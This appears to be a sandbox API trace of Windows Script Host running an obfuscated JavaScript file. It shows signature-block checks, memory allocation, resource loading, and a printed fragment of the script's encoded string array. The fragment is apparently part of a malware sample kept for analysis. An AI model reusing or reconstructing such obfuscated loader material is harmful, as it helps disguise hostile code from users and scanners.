	[0090.301] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.301] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0090.301] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.301] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0090.302] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.302] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0090.302] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0090.302] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0090.302] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0090.302] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.302] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0090.302] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0090.302] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.302] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0090.302] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0090.302] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0090.302] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0090.302] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0090.302] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0090.302] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0090.302] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0090.302] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0090.302] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0090.302] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0090.302] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0090.302] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.302] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0090.302] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.302] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.302] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0090.302] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0090.302] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.302] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0090.302] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.302] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0090.302] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0090.302] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.302] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0090.302] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0090.302] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.302] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0090.302] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0090.302] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0090.302] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0090.303] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0090.303] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0090.303] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0090.303] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0090.303] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.303] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0090.303] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.303] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.303] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0090.303] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0090.303] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.303] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0090.303] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0090.303] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0090.303] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0090.303] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0090.303] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0090.303] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.303] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.303] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0090.303] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0090.303] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0090.303] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0090.303] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0090.303] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0090.303] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.303] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0090.303] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.303] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0090.303] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0090.303] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.303] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0090.303] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0090.303] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0090.303] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0090.303] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0090.303] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.303] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.303] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0090.303] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0090.304] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0090.304] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0090.304] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.305] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0090.305] CloseCodeAuthzLevel () returned 0x1
	[0090.305] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0090.305] ??2@YAPEAX_K@Z () returned 0x19f3f0
	[0090.306] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0090.306] GetProcessHeap () returned 0x420000
	[0090.306] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x458430, Size=0x11238) returned 0x48aef0
	[0090.307] ??2@YAPEAX_K@Z () returned 0x19f480
	[0090.307] GetCurrentThreadId () returned 0xb9c
	[0090.307] realloc (_Block=0x0, _Size=0xc8) returned 0x19f4e0
	[0090.307] ??2@YAPEAX_K@Z () returned 0x19f5b0
	[0090.307] malloc (_Size=0x1008) returned 0x19a4f0
	[0090.307] ??2@YAPEAX_K@Z () returned 0x19f5f0
	[0090.307] malloc (_Size=0x108) returned 0x197d80
	[0090.308] malloc (_Size=0x208) returned 0x19f7a0
	[0090.308] malloc (_Size=0x200) returned 0x19f9b0
	[0090.308] malloc (_Size=0x408) returned 0x19fbc0
	[0090.308] malloc (_Size=0x2008) returned 0x19b500
	[0090.309] malloc (_Size=0x808) returned 0x19d510
	[0090.309] malloc (_Size=0x1008) returned 0x19dd20
	[0090.310] malloc (_Size=0x4008) returned 0x30dfd0
	[0090.310] malloc (_Size=0x2008) returned 0x311fe0
	[0090.313] malloc (_Size=0x4008) returned 0x313ff0
	[0091.979] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0091.979] CObjectContext::Release () returned 0x1
	[0091.979] GetTickCount () returned 0x27925
	[0091.980] ??2@YAPEAX_K@Z () returned 0x316b10
	[0091.980] ??2@YAPEAX_K@Z () returned 0x316b40
	[0091.980] ??2@YAPEAX_K@Z () returned 0x316b70
	[0091.981] ??2@YAPEAX_K@Z () returned 0x316ba0
	[0091.981] ??2@YAPEAX_K@Z () returned 0x316bd0
	[0091.982] ??2@YAPEAX_K@Z () returned 0x316c00
	[0091.982] ??2@YAPEAX_K@Z () returned 0x316c30
	[0091.983] ??2@YAPEAX_K@Z () returned 0x316c60
	[0091.983] ??2@YAPEAX_K@Z () returned 0x316c90
	[0091.984] ??2@YAPEAX_K@Z () returned 0x316cc0
	[0091.984] ??2@YAPEAX_K@Z () returned 0x316cf0
	[0091.984] ??2@YAPEAX_K@Z () returned 0x316d20
	[0091.985] ??2@YAPEAX_K@Z () returned 0x316d50
	[0091.987] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0091.987] CObjectContext::Release () returned 0x1
	[0091.987] GetTickCount () returned 0x27934
	[0091.987] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0091.987] CObjectContext::Release () returned 0x1
	[0091.987] GetTickCount () returned 0x27934
	[0091.990] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0091.990] CObjectContext::Release () returned 0x1
	[0091.990] GetTickCount () returned 0x27934
	[0091.991] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0091.991] CObjectContext::Release () returned 0x1
	[0091.991] GetTickCount () returned 0x27934
	[0091.991] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0091.991] CObjectContext::Release () returned 0x1
	[0091.991] GetTickCount () returned 0x27934
	[0091.995] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0091.995] CObjectContext::Release () returned 0x1
	[0091.995] GetTickCount () returned 0x27934
	[0091.998] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0091.998] CObjectContext::Release () returned 0x1
	[0091.998] GetTickCount () returned 0x27934
	[0091.999] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0091.999] CObjectContext::Release () returned 0x1
	[0091.999] GetTickCount () returned 0x27944
	[0092.000] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0092.000] CObjectContext::Release () returned 0x1
	[0092.000] GetTickCount () returned 0x27944
	[0092.001] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0092.001] CObjectContext::Release () returned 0x1
	[0092.001] GetTickCount () returned 0x27944
	[0092.002] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0092.002] CObjectContext::Release () returned 0x1
	[0092.002] GetTickCount () returned 0x27944
	[0092.003] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0092.003] CObjectContext::Release () returned 0x1
	[0092.003] GetTickCount () returned 0x27944
	[0092.004] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0092.004] CObjectContext::Release () returned 0x1
	[0092.004] GetTickCount () returned 0x27944
	[0092.005] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0092.005] CObjectContext::Release () returned 0x1
	[0092.005] GetTickCount () returned 0x27944
	[0092.006] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0092.006] CObjectContext::Release () returned 0x1
	[0092.006] GetTickCount () returned 0x27944
	[0092.007] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0092.007] CObjectContext::Release () returned 0x1
	[0092.007] GetTickCount () returned 0x27944
	[0092.009] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0092.009] CObjectContext::Release () returned 0x1
	[0092.009] GetTickCount () returned 0x27944
	[0092.009] FindResourceA (hModule=0x7fee13d0000, lpName=0x139, lpType=0x6) returned 0x1207f8
	[0092.010] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207f8) returned 0x121d44
	[0092.010] LockResource (hResData=0x121d44) returned 0x121d44
	[0092.010] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207f8) returned 0x15c
	[0092.010] FreeResource (hResData=0x121d44) returned 0
	[0092.010] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0092.010] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0092.010] LockResource (hResData=0x121c74) returned 0x121c74
